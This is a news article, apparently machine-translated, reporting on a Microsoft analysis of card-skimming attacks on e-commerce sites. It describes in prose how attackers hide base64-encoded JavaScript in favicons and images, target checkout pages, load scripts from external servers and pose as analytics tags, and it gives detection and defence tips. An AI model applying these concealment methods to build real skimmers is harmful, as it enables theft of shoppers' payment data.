Bank cards hacked, MICROSOFT alerts

Microsoft has released a report warning of new methods used by hackers to hide their texts on hacked sites. In particular, they use base 64 cipher to hide the loading of external files and make their code appear harmless.
Entering the code to steal bank details on merchant sites, or skimming in English, is nothing new. However, as with all threats on the web, the authors are constantly improving their tools to stay one step ahead of cybersecurity professionals. Hackers have developed new techniques to hide their code to avoid detection, according to a new report from Microsoft.

Initially, hackers targeted vulnerabilities in platforms such as Magent, PrestaShop or WordPress, and contented themselves with injecting JavaScript. One of the most well-known attacks of this type is Magecart, it was first discovered in 2010 and caused a new wave of attacks in 2019. While new technologies still require a data injection vulnerability to the server, JavaScript code is no longer left in the evidence.

malicious code in the image
The first approach is to pass the code as something else. Microsoft notably discovered JavaScript, which is encoded in base 64 in PHP code, and is itself embedded in an image. In one case, the authors used the favorite icon (the site icon displayed in the address bar or on bookmarks), and in another they used a simple image. All they had to do was add the PHP include() function to the site’s index page, an addition that no one would ever notice. In both cases, the PHP script checks the page title for the terms “checkout” and “on page”, which correspond to the Magento payment page. It also checks cookies to ensure that the user is not responsible. Once it’s done, it decodes a JavaScript script that will display a fake payment form and then sends the data to an external server.

Persuasive titles by encoding them in base 64
The second method adds four lines of JavaScript to the page. In the same way, the script runs only on the page whose title contains the term “checkout”, since the base 64 keyword is encoded in the script to pass unnoticed. Then it downloads another script hosted on an external server, whose address is encoded in base 64 and divided into several groups of concatenated characters. This script ensures that browser developer tools are not open, and saves payment form data in an image, which is sent to an external address.

Finally, for the third method, hackers pass their script as an official Google Analytics script or Meta Pixel audience analysis software. Again, the authors added a simple script that downloads a second script from an external server, and used base-64 encoding to mask the address.

The common point of all these techniques is the use of character strings in base 64, in particular the JavaScript atob() function to decode them. This can help developers detect infected sites. On the other hand, it is difficult for Internet users to defend themselves against this type of attack, except by using methods such as single-use virtual bank cards. On the site administrators’ side, Microsoft advises that you check that your CMS and all extensions are up to date.



#Bank #cards #hacked #MICROSOFT #alerts

Leave a Comment

Your email address will not be published.